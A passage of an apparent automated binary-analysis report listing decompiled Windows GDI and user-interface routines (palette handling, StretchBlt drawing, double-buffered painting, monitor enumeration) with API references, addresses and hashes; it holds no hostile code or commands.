                                                                                • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                • API String ID: 1416857345-3736581797
                                                                                • Opcode ID: 2c9b3530a110b372408bf4c6c2d965b1754e1e16bcc24b4688114d6c705e0e5e
                                                                                • Instruction ID: c3ea70c89f0ea32afbae36cd1b4525e37670a6f3dc8583698f1fb75301f17434
                                                                                • Opcode Fuzzy Hash: 2c9b3530a110b372408bf4c6c2d965b1754e1e16bcc24b4688114d6c705e0e5e
                                                                                • Instruction Fuzzy Hash: 56113D70A48302AFF3109FA5C841F6AB7A8EF44350F204136BD40AB2C1D6B97D40D7AA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00426730, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E00426730(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x487ac3 != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x487ab0 = E00426184(7, _t60,  *0x487ab0, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                                                                0x00426739
                                                                                0x0042673c
                                                                                0x00426746
                                                                                0x00426776
                                                                                0x0042677c
                                                                                0x00426838
                                                                                0x00426840
                                                                                0x00426840
                                                                                0x00426784
                                                                                0x00426789
                                                                                0x00426794
                                                                                0x0042679f
                                                                                0x004267a4
                                                                                0x0042680d
                                                                                0x00426825
                                                                                0x00426836
                                                                                0x00426821
                                                                                0x00426821
                                                                                0x00426821
                                                                                0x00000000
                                                                                0x0042680d
                                                                                0x004267b0
                                                                                0x004267bf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004267d1
                                                                                0x004267e9
                                                                                0x004267ff
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00426805
                                                                                0x00426807
                                                                                0x00426807
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004267e9
                                                                                0x0042675a
                                                                                0x0042676f
                                                                                0x00000000

                                                                                APIs
                                                                                • EnumDisplayMonitors.USER32(?,?,?,?), ref: 00426769
                                                                                • GetSystemMetrics.USER32 ref: 0042678E
                                                                                • GetSystemMetrics.USER32 ref: 00426799
                                                                                • GetClipBox.GDI32(?,?), ref: 004267AB
                                                                                • GetDCOrgEx.GDI32(?,?), ref: 004267B8
                                                                                • OffsetRect.USER32(?,?,?), ref: 004267D1
                                                                                • IntersectRect.USER32 ref: 004267E2
                                                                                • IntersectRect.USER32 ref: 004267F8
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                • String ID: EnumDisplayMonitors
                                                                                • API String ID: 362875416-2491903729
                                                                                • Opcode ID: 1bceec31a97047a135f8e3041124f4b3fe8bd7a74cfebfffb60f8441dabb4c7a
                                                                                • Instruction ID: 5c2863997b3cb52ba5e54f8a7e46798dd5e683742b03c6a955819f0358736904
                                                                                • Opcode Fuzzy Hash: 1bceec31a97047a135f8e3041124f4b3fe8bd7a74cfebfffb60f8441dabb4c7a
                                                                                • Instruction Fuzzy Hash: EC3130B2E05119AFDB10DFA5E8449EFB7BCEF09304F51452BE915E2240EB38DA118BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00423C56, Relevance: 16.7, APIs: 11, Instructions: 165windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E00423C56(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				struct HPALETTE__* _t74;
				signed int _t80;
				signed int _t81;
				char _t82;
				void* _t89;
				void* _t135;
				intOrPtr* _t165;
				intOrPtr _t173;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t181;
				int* _t185;
				intOrPtr _t187;
				void* _t189;
				void* _t190;
				intOrPtr _t191;

				_t166 = __ecx;
				_t189 = _t190;
				_t191 = _t190 + 0xffffffe4;
				_t185 = __ecx;
				_v8 = __edx;
				_t165 = __eax;
				_t187 =  *((intOrPtr*)(__eax + 0x28));
				_t173 =  *0x423ea4; // 0xf
				E0041FE98(_v8, __ecx, _t173);
				E004242C8(_t165);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *(_t187 + 0x10);
				if(_t74 != 0) {
					_v12 = SelectPalette( *(_v8 + 4), _t74, 0xffffffff);
					RealizePalette( *(_v8 + 4));
					_v13 = 1;
				}
				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
				_t80 = GetDeviceCaps( *(_v8 + 4), 0xe);
				_pop(_t174);
				_t81 = _t174 * _t80;
				if(_t81 > 8) {
					L5:
					_t82 = 0;
				} else {
					_t166 =  *(_t187 + 0x28) & 0x0000ffff;
					if(_t81 < ( *(_t187 + 0x2a) & 0x0000ffff) * ( *(_t187 + 0x28) & 0x0000ffff)) {
						_t82 = 1;
					} else {
						goto L5;
					}
				}
				if(_t82 == 0) {
					if(E00423FE4(_t165) == 0) {
						SetStretchBltMode(E0041FDC4(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t189);
				_push(0x423e95);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				if( *((intOrPtr*)( *_t165 + 0x28))() != 0) {
					E00424268(_t165, _t166);
				}
				_t89 = E00423F28(_t165);
				_t177 =  *0x423ea4; // 0xf
				E0041FE98(_t89, _t166, _t177);
				if( *((intOrPtr*)( *_t165 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t185, _t185[1], _t185[2] -  *_t185, _t185[3] - _t185[1],  *(E00423F28(_t165) + 4), 0, 0,  *(_t187 + 0x1c),  *(_t187 + 0x20),  *(_v8 + 0x20));
					_pop(_t179);
					 *[fs:eax] = _t179;
					_push(E00423E9C);
					if(_v13 != 0) {
						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t189);
					_push(0x423e2a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t191;
					_v28 = E004201BC(CreateCompatibleDC(0));
					_v32 = SelectObject(_v28,  *(_t187 + 0xc));
					E00420360( *(_v8 + 4), _t165, _t185[1],  *_t185, _t185, _t187, 0, 0, _v28,  *(_t187 + 0x20),  *(_t187 + 0x1c), 0, 0,  *(E00423F28(_t165) + 4), _t185[3] - _t185[1], _t185[2] -  *_t185);
					_t135 = 0;
					_pop(_t181);
					 *[fs:eax] = _t181;
					_push(0x423e6f);
					if(_v32 != 0) {
						_t135 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t135;
				}
			}


























                                                                                0x00423c56
                                                                                0x00423c59
                                                                                0x00423c5b
                                                                                0x00423c61
                                                                                0x00423c63
                                                                                0x00423c66
                                                                                0x00423c68
                                                                                0x00423c6b
                                                                                0x00423c74
                                                                                0x00423c7b
                                                                                0x00423c82
                                                                                0x00423c85
                                                                                0x00423c89
                                                                                0x00423c8e
                                                                                0x00423c9f
                                                                                0x00423ca9
                                                                                0x00423cae
                                                                                0x00423cae
                                                                                0x00423cc0
                                                                                0x00423cca
                                                                                0x00423ccf
                                                                                0x00423cd3
                                                                                0x00423cd8
                                                                                0x00423ce9
                                                                                0x00423ce9
                                                                                0x00423cda
                                                                                0x00423cde
                                                                                0x00423ce7
                                                                                0x00423ced
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423ce7
                                                                                0x00423cf1
                                                                                0x00423d34
                                                                                0x00423d41
                                                                                0x00423d41
                                                                                0x00423cf3
                                                                                0x00423cfe
                                                                                0x00423d0c
                                                                                0x00423d24
                                                                                0x00423d24
                                                                                0x00423d48
                                                                                0x00423d49
                                                                                0x00423d4e
                                                                                0x00423d51
                                                                                0x00423d5d
                                                                                0x00423d61
                                                                                0x00423d61
                                                                                0x00423d68
                                                                                0x00423d6d
                                                                                0x00423d73
                                                                                0x00423d81
                                                                                0x00423e6a
                                                                                0x00423e71
                                                                                0x00423e74
                                                                                0x00423e77
                                                                                0x00423e80
                                                                                0x00000000
                                                                                0x00423e8f
                                                                                0x00423e94
                                                                                0x00423d87
                                                                                0x00423d89
                                                                                0x00423d8e
                                                                                0x00423d93
                                                                                0x00423d94
                                                                                0x00423d99
                                                                                0x00423d9c
                                                                                0x00423dab
                                                                                0x00423dbb
                                                                                0x00423df5
                                                                                0x00423dfa
                                                                                0x00423dfc
                                                                                0x00423dff
                                                                                0x00423e02
                                                                                0x00423e0b
                                                                                0x00423e15
                                                                                0x00423e15
                                                                                0x00423e1e
                                                                                0x00000000
                                                                                0x00423e24
                                                                                0x00423e29
                                                                                0x00423e29

                                                                                APIs
                                                                                  • Part of subcall function 004242C8: GetDC.USER32(00000000), ref: 0042431E
                                                                                  • Part of subcall function 004242C8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424333
                                                                                  • Part of subcall function 004242C8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042433D
                                                                                  • Part of subcall function 004242C8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                  • Part of subcall function 004242C8: ReleaseDC.USER32 ref: 0042436C
                                                                                • SelectPalette.GDI32(?,?,000000FF), ref: 00423C9A
                                                                                • RealizePalette.GDI32(?), ref: 00423CA9
                                                                                • GetDeviceCaps.GDI32(?,0000000C), ref: 00423CBB
                                                                                • GetDeviceCaps.GDI32(?,0000000E), ref: 00423CCA
                                                                                • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00423CFE
                                                                                • SetStretchBltMode.GDI32(?,00000004), ref: 00423D0C
                                                                                • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00423D24
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00423DA1
                                                                                • SelectObject.GDI32(?,?), ref: 00423DB6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CapsDevice$Palette$BrushCreateSelect$CompatibleHalftoneModeObjectRealizeReleaseStretch
                                                                                • String ID:
                                                                                • API String ID: 2358456236-0
                                                                                • Opcode ID: 12acc6d8c85570ecbd788fee79e40e5dfd11f6c11a147245e055a6f39af01ba2
                                                                                • Instruction ID: 825b2f3cc26a81e0a9d54884291c02793650457c26c19799d0130e999e4e799f
                                                                                • Opcode Fuzzy Hash: 12acc6d8c85570ecbd788fee79e40e5dfd11f6c11a147245e055a6f39af01ba2
                                                                                • Instruction Fuzzy Hash: 10514971B00215AFCB40EFA9D985E5EBBF8AB09304F51846AF508EB291D638EE44CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00439F44, Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E00439F44(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				struct HBITMAP__* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				int _v84;
				void* _v96;
				int _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t59;
				intOrPtr* _t88;
				intOrPtr _t107;
				void* _t108;
				struct HDC__* _t110;
				void* _t113;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t116 = _t118;
				_t119 = _t118 + 0xffffff94;
				_push(_t108);
				_t113 = __edx;
				_t88 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t88 + 0x55) & 0x00000001) != 0 || E00438B9C(_t88) != 0) {
						_t38 = E00439A64(_t88, _t88, _t113, _t108, _t113);
					} else {
						_t38 =  *((intOrPtr*)( *_t88 - 0x10))();
					}
					return _t38;
				} else {
					_t110 = GetDC(0);
					 *((intOrPtr*)( *_t88 + 0x44))();
					 *((intOrPtr*)( *_t88 + 0x44))();
					_v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
					ReleaseDC(0, _t110);
					_v8 = CreateCompatibleDC(0);
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t119;
					_t59 = BeginPaint(E0043BD14(_t88),  &_v80);
					E00436848(_t88, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t113 + 4)) = _v8;
					E00439F44(_t88, _t113);
					 *((intOrPtr*)(_t113 + 4)) = 0;
					 *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x43a096, _t116);
					 *((intOrPtr*)( *_t88 + 0x44))();
					BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
					EndPaint(E0043BD14(_t88),  &_v80);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x43a09d);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

























                                                                                0x00439f45
                                                                                0x00439f47
                                                                                0x00439f4c
                                                                                0x00439f4d
                                                                                0x00439f4f
                                                                                0x00439f58
                                                                                0x00439f64
                                                                                0x00439f83
                                                                                0x00439f71
                                                                                0x00439f77
                                                                                0x00439f77
                                                                                0x0043a0a3
                                                                                0x00439f8d
                                                                                0x00439f94
                                                                                0x00439f9d
                                                                                0x00439fab
                                                                                0x00439fb8
                                                                                0x00439fbe
                                                                                0x00439fca
                                                                                0x00439fda
                                                                                0x00439fe8
                                                                                0x00439ff7
                                                                                0x0043a00c
                                                                                0x0043a014
                                                                                0x0043a01b
                                                                                0x0043a022
                                                                                0x0043a039
                                                                                0x0043a047
                                                                                0x0043a053
                                                                                0x0043a064
                                                                                0x0043a06b
                                                                                0x0043a06e
                                                                                0x0043a071
                                                                                0x0043a07e
                                                                                0x0043a087
                                                                                0x0043a095
                                                                                0x0043a095

                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00439F8F
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00439FB3
                                                                                • ReleaseDC.USER32 ref: 00439FBE
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00439FC5
                                                                                • SelectObject.GDI32(00000000,?), ref: 00439FD5
                                                                                • BeginPaint.USER32(00000000,?,00000000,0043A096,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00439FF7
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0043A053
                                                                                • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043A064
                                                                                • SelectObject.GDI32(00000000,?), ref: 0043A07E
                                                                                • DeleteDC.GDI32(00000000), ref: 0043A087
                                                                                • DeleteObject.GDI32(?), ref: 0043A090
                                                                                  • Part of subcall function 00439A64: BeginPaint.USER32(00000000,?), ref: 00439A8A
                                                                                  • Part of subcall function 00439A64: EndPaint.USER32(00000000,?,00439B8B), ref: 00439B7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                                                                                • String ID:
                                                                                • API String ID: 3867285559-0
                                                                                • Opcode ID: 6a9e0f0aa6bc594f610b22cb0e1bc7e759010655ccbd2b8d161eadcb6350d9a1
                                                                                • Instruction ID: 306c7afd92af40a217dbe2fff1c1d45e4c1a113081206cfcf9a7c14f3e5101a4
                                                                                • Opcode Fuzzy Hash: 6a9e0f0aa6bc594f610b22cb0e1bc7e759010655ccbd2b8d161eadcb6350d9a1
                                                                                • Instruction Fuzzy Hash: 5A412E71B00204AFD710EFA9CC85B9EB7F9AF4D704F10447AB91AEB291DA78AD058B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041F5A8, Relevance: 15.2, APIs: 10, Instructions: 224windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E0041F5A8(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, intOrPtr _a4, int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				int _v16;
				int _v20;
				int _v24;
				long _v28;
				long _v32;
				struct HDC__* _v36;
				intOrPtr* _v40;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t116;
				void* _t124;
				int* _t197;
				intOrPtr _t205;
				intOrPtr _t209;
				intOrPtr _t210;
				intOrPtr _t211;
				int _t217;
				int* _t219;
				void* _t222;
				void* _t224;
				intOrPtr _t225;

				_t199 = __ecx;
				_t222 = _t224;
				_t225 = _t224 + 0xffffffd8;
				_v12 = __ecx;
				_t219 = __edx;
				_v8 = __eax;
				_t197 = _a8;
				if(_v12 != 0) {
					E0041FA80(_v8);
					 *[fs:eax] = _t225;
					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x41f84e, _t222);
					_t205 =  *0x41f860; // 0x9
					E0041FE98(_v8, __ecx, _t205);
					E0041FA80(E00423F28(_v12));
					_push(_t222);
					_push(0x41f829);
					_push( *[fs:eax]);
					 *[fs:eax] = _t225;
					_v20 = _t219[2] -  *_t219;
					_v24 = _t219[3] - _t219[1];
					_t217 = _t197[2] -  *_t197;
					_v16 = _t197[3] - _t197[1];
					if(E00424014(_v12, _t199) != _a4) {
						_v40 = E00423960(1);
						_t199 =  *_v40;
						 *((intOrPtr*)( *_v40 + 8))();
						E00424188(_v40, _a4, __eflags);
						_t116 = E00423F28(_v40);
						_t209 =  *0x41f864; // 0x1
						E0041FE98(_t116,  *_v40, _t209);
						_v36 =  *((intOrPtr*)(E00423F28(_v40) + 4));
						__eflags = 0;
						_v44 = 0;
					} else {
						_v40 = 0;
						_v44 =  *((intOrPtr*)( *_v12 + 0x68))();
						_v36 = CreateCompatibleDC(0);
						_v44 = SelectObject(_v36, _v44);
					}
					_push(_t222);
					_push(0x41f807);
					_push( *[fs:eax]);
					 *[fs:eax] = _t225;
					_t124 = E00423F28(_v12);
					_t210 =  *0x41f864; // 0x1
					E0041FE98(_t124, _t199, _t210);
					if(E0041F44C( *((intOrPtr*)(_v8 + 0x14))) != 1) {
						StretchBlt( *(_v8 + 4),  *_t219, _t219[1], _v20, _v24,  *(E00423F28(_v12) + 4),  *_t197, _t197[1], _t217, _v16, 0xcc0020);
						_v32 = SetTextColor( *(_v8 + 4), 0);
						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
						StretchBlt( *(_v8 + 4),  *_t219, _t219[1], _v20, _v24, _v36,  *_t197, _t197[1], _t217, _v16, 0xe20746);
						SetTextColor( *(_v8 + 4), _v32);
						SetBkColor( *(_v8 + 4), _v28);
					} else {
						E00420360( *(_v8 + 4), _t197, _t219[1],  *_t219, _t217, _t219, _t197[1],  *_t197, _v36, _v16, _t217, _t197[1],  *_t197,  *(E00423F28(_v12) + 4), _v24, _v20);
					}
					_pop(_t211);
					 *[fs:eax] = _t211;
					_push(E0041F80E);
					if(_v40 == 0) {
						__eflags = _v44;
						if(_v44 != 0) {
							SelectObject(_v36, _v44);
						}
						return DeleteDC(_v36);
					} else {
						return E004035B4(_v40);
					}
				}
				return __eax;
			}





























                                                                                0x0041f5a8
                                                                                0x0041f5a9
                                                                                0x0041f5ab
                                                                                0x0041f5b1
                                                                                0x0041f5b4
                                                                                0x0041f5b6
                                                                                0x0041f5b9
                                                                                0x0041f5c0
                                                                                0x0041f5c9
                                                                                0x0041f5d9
                                                                                0x0041f5e1
                                                                                0x0041f5e4
                                                                                0x0041f5ed
                                                                                0x0041f5fa
                                                                                0x0041f601
                                                                                0x0041f602
                                                                                0x0041f607
                                                                                0x0041f60a
                                                                                0x0041f612
                                                                                0x0041f61b
                                                                                0x0041f621
                                                                                0x0041f629
                                                                                0x0041f637
                                                                                0x0041f671
                                                                                0x0041f67a
                                                                                0x0041f67c
                                                                                0x0041f685
                                                                                0x0041f68d
                                                                                0x0041f692
                                                                                0x0041f698
                                                                                0x0041f6a8
                                                                                0x0041f6ab
                                                                                0x0041f6ad
                                                                                0x0041f639
                                                                                0x0041f63b
                                                                                0x0041f646
                                                                                0x0041f650
                                                                                0x0041f660
                                                                                0x0041f660
                                                                                0x0041f6b2
                                                                                0x0041f6b3
                                                                                0x0041f6b8
                                                                                0x0041f6bb
                                                                                0x0041f6c1
                                                                                0x0041f6c6
                                                                                0x0041f6cc
                                                                                0x0041f6de
                                                                                0x0041f753
                                                                                0x0041f766
                                                                                0x0041f77a
                                                                                0x0041f7a8
                                                                                0x0041f7b8
                                                                                0x0041f7c8
                                                                                0x0041f6e0
                                                                                0x0041f716
                                                                                0x0041f716
                                                                                0x0041f7cf
                                                                                0x0041f7d2
                                                                                0x0041f7d5
                                                                                0x0041f7de
                                                                                0x0041f7ea
                                                                                0x0041f7ee
                                                                                0x0041f7f8
                                                                                0x0041f7f8
                                                                                0x00000000
                                                                                0x0041f7e0
                                                                                0x00000000
                                                                                0x0041f7e3
                                                                                0x0041f7de
                                                                                0x0041f85b

                                                                                APIs
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA88
                                                                                  • Part of subcall function 0041FA80: RtlLeaveCriticalSection.KERNEL32(00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA95
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00000038,00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA9E
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0041F64B
                                                                                • SelectObject.GDI32(?,?), ref: 0041F65B
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 0041F753
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0041F761
                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 0041F775
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 0041F7A8
                                                                                • SetTextColor.GDI32(?,?), ref: 0041F7B8
                                                                                • SetBkColor.GDI32(?,?), ref: 0041F7C8
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041F7F8
                                                                                • DeleteDC.GDI32(?), ref: 0041F801
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Color$CriticalSection$EnterObjectSelectStretchText$CompatibleCreateDeleteLeave
                                                                                • String ID:
                                                                                • API String ID: 675119849-0
                                                                                • Opcode ID: 8fade14a0b8bb6aa5a3d00aa6ebabbc3893095b24b0ee73f5b28fa93de154169
                                                                                • Instruction ID: 56eeb733055bb1c0b9ac4d539382dbe7af899076f26b7cfa990cf846c4f30ea4
                                                                                • Opcode Fuzzy Hash: 8fade14a0b8bb6aa5a3d00aa6ebabbc3893095b24b0ee73f5b28fa93de154169
                                                                                • Instruction Fuzzy Hash: 3591C675A00118EFCB40EFA9D981E9EBBF8EF0D304B5544AAF508EB251C638ED45CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00439BC0, Relevance: 15.2, APIs: 10, Instructions: 177windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00439BC0(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E00413FA4( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041E68C(0x80000010));
							E00412984( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
